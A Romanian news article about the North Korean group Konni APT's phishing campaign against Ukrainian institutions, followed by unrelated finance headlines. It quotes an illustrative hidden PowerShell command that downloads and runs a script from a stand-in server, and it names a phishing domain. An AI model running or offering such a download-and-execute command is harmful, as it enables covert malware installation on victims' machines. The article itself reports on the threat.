Prima pagină » Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Gruparea nord-coreeană de spionaj cibernetic Konni APT a lansat un atac informatic îndreptat împotriva Ucrainei prin care vizează în special instituțiile guvernamentale.

Această ofensivă digitală are ca scop monitorizarea conflictului ruso-ucrainean și colectarea de date despre strategiile militare ale Kremlinului.

Cine sunt Konni APT?

Coreea de Nord

Konni APT, cunoscută și sub denumirile de Opal Sleet, Osmium, TA406 și Vedalia, este o grupare nord-coreeană de spionaj cibernetic. Activ de peste un deceniu, grupul a țintit entități guvernamentale din Coreea de Sud, Statele Unite, Rusia și, mai nou, Ucraina.

Arma principală a nord-coreenilor se numește Konni RAT (n.n. – Remote Access Trojan), cunoscut și ca UpDog. Este vorba despre un program malware (software rău intenționat) versatil, care le permite supravegherea continuă și chiar controlul total al dispozitivelor compromise.

Cea mai recentă campanie a hackerilor Konni a început în februarie 2025. Aceasta vizează colectarea de informații cu privire la „traiectoria invaziei ruse” în Ucraina, potrivit Medium.com. Departe de a se limita la interceptarea comunicațiilor, malware-ul vizează perspective strategice, politice și militare, care pot influența deciziile Phenianului în ceea ce privește sprijinul acordat Rusiei în acest conflict militar.

Phishing mascat în expertiză geopolitică

Foto: Proofpoint.com

Tactica preferată a atacatorilor presupune trimiterea de e-mailuri aparent inofensive, dar atent fabricate, care se dau drept comunicări din partea unor așa-zise grupuri de experți în politică și securitate.

Potrivit Proofpoint, o firmă de top în domeniul securității informatice pentru întreprinderi, mesajele fac referire la subiecte sensibile din actualitatea ucraineană. Este vorba despre destituiri la nivel înalt în armata ucraineană sau alegerile prezidențiale din Ucraina pentru a câștiga încrederea destinatarilor.

Odată ce victima deschide fișierul atașat, care de obicei este o arhivă RAR cu parolă denumită „Analytical Report.rar”, se execută un fișier CHM capabil să lanseze un script PowerShell. Acesta inițiază o etapă secundară a atacului informatic, descărcând alte scripturi menite să extragă informații sensibile, să stabilească accesul pe termen lung și, probabil, să pregătească terenul pentru un backdoor personalizat.

De obicei, hackerii Konni APT se bazează pe platforme gratuite precum Gmail, Outlook sau ProtonMail pentru a trimite în mod repetat mesajele periculoase, iar descărcările sunt găzduite pe servicii precum MEGA. În unele variante ale atacurilor au fost detectate și metode alternative, precum fișiere HTML care duc la arhive ZIP cu fișiere LNK și PDF. Aparent inofensive, acestea ascund componente malware capabile să execute comenzi VBScript și PowerShell, relatează Cybersecuritynews.com.

O structură tipică de comenzi ar putea semăna cu: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command „$c=’IEX (New-Object Net.WebClient).DownloadString(”http://compromised-server.com/payload.ps1”)’; iex $c”

Deși payload-ul final nu a fost identificat de cercetători în toate cazurile, toate indiciile duc spre existența unei componente de tip backdoor, concepută să faciliteze supravegherea de lungă durată și eventuale acțiuni de sabotaj digital.

Ce urmărește Konni APT

Experții în securitate cibernetică spun că scopul acestor atacuri este de a oferi regimului de la Phenian o imagine clară a angajamentului militar ucrainean, dar și a gradului de implicare al Rusiei.

Se bănuiește că aceste date ar putea influența deciziile liderilor nord-coreeni în ceea ce privește eventuale mișcări suplimentare, fie trimiterea de personal militar, fie furnizarea de armament către Moscova.

Gruparea nord-coreeană nu se află la primul atac de acest gen. Konni a desfășurat anterior operațiuni de tip spear phishing menite să compromită conturi de e-mail, folosind alerte false de securitate Microsoft pentru a colecta acreditări. De exemplu, au circulat mesaje care avertizau despre „activitate suspectă de autentificare”, redirecționând victimele către site-uri capcană precum „jetmf[.]com”.

Alte articole importante
Codirlașu (CFA România): Raportul Fitch indică o deteriorare a perspectivelor economiei românești
Codirlașu (CFA România): Raportul Fitch indică o deteriorare a perspectivelor economiei românești
Președintele Asociației CFA România, Adrian Codirlașu, consideră că decizia Fitch de a menține ratingul suveran al României la „BBB minus”, cu perspectivă negativă, ascunde de fapt o înrăutățire a evaluării privind economia țării. În opinia sa, agenția de rating ar fi luat inițial în calcul o retrogradare, însă a decis în cele din urmă să […]
Bursa de Valori București a pierdut peste 400 de milioane de lei din capitalizare într-o săptămână
Bursa de Valori București a pierdut peste 400 de milioane de lei din capitalizare într-o săptămână
Bursa de Valori București (BVB) a încheiat ultima săptămână din iulie cu o scădere de peste 404 milioane de lei a capitalizării bursiere, în timp ce valoarea tranzacțiilor cu acțiuni s-a redus cu mai mult de 269 de milioane de lei față de săptămâna precedentă. Capitalizarea și rulajul au scăzut În perioada 27–31 iulie, capitalizarea […]
Analiză XTB: Războiul din Iran a impulsionat tranzacțiile investitorilor români. Aurul, petrolul și indicii americani au atras cel mai mare interes
Piață de Capital - Fonduri
Analiză XTB: Războiul din Iran a impulsionat tranzacțiile investitorilor români. Aurul, petrolul și indicii americani au atras cel mai mare interes
Investitorii români nu au abandonat piețele financiare în perioada de volatilitate provocată de escaladarea conflictului din Iran, ci au devenit mai activi și și-au orientat capitalul către active considerate sensibile la mișcările bruște ale pieței, precum aurul, petrolul și indicii bursieri americani, potrivit unei analize publicate de XTB România. Atacul Statelor Unite asupra Iranului, de […]
Regulile UE privind subvențiile externe descurajează firmele chineze. Cu ce preț?
Economie mondială
Regulile UE privind subvențiile externe descurajează firmele chineze. Cu ce preț?
La trei ani de la intrarea în vigoare, Regulamentul UE privind Subvențiile Externe (FSR) și-a atins unul dintre principalele obiective: descurajarea companiilor care beneficiază de sprijin financiar din afara Uniunii Europene și care ar putea denatura concurența pe piața comunitară. Instrumentul este folosit pentru a verifica dacă subvențiile acordate de state terțe influențează licitațiile publice, […]
Bursa de Valori București a încheiat luna iulie pe plus
Piață de Capital - Fonduri
Bursa de Valori București a încheiat luna iulie pe plus
Bursa de Valori București (BVB) a închis în creștere ultima ședință de tranzacționare din luna iulie, majoritatea indicilor înregistrând aprecieri. Valoarea totală a tranzacțiilor s-a ridicat la 140,3 milioane de lei, echivalentul a aproximativ 26,74 milioane de euro. Indicii principali au înregistrat creșteri Indicele BET, care urmărește evoluția celor mai lichide 20 de companii listate, […]
Franța reduce participația statului la Orange printr-o ofertă accelerată de acțiuni. Tranzacția este estimată la 1,1 miliarde de euro
Companii
Franța reduce participația statului la Orange printr-o ofertă accelerată de acțiuni. Tranzacția este estimată la 1,1 miliarde de euro
Statul francez intenționează să vândă o parte din participația deținută la Orange, cel mai mare operator de telecomunicații din Franța, printr-o ofertă secundară accelerată de acțiuni. Potrivit unor surse citate de Reuters, tranzacția ar putea aduce aproximativ 1,1 miliarde de euro. Oferta este derulată prin Agenția pentru Participațiile Statului (APE) și banca publică de investiții […]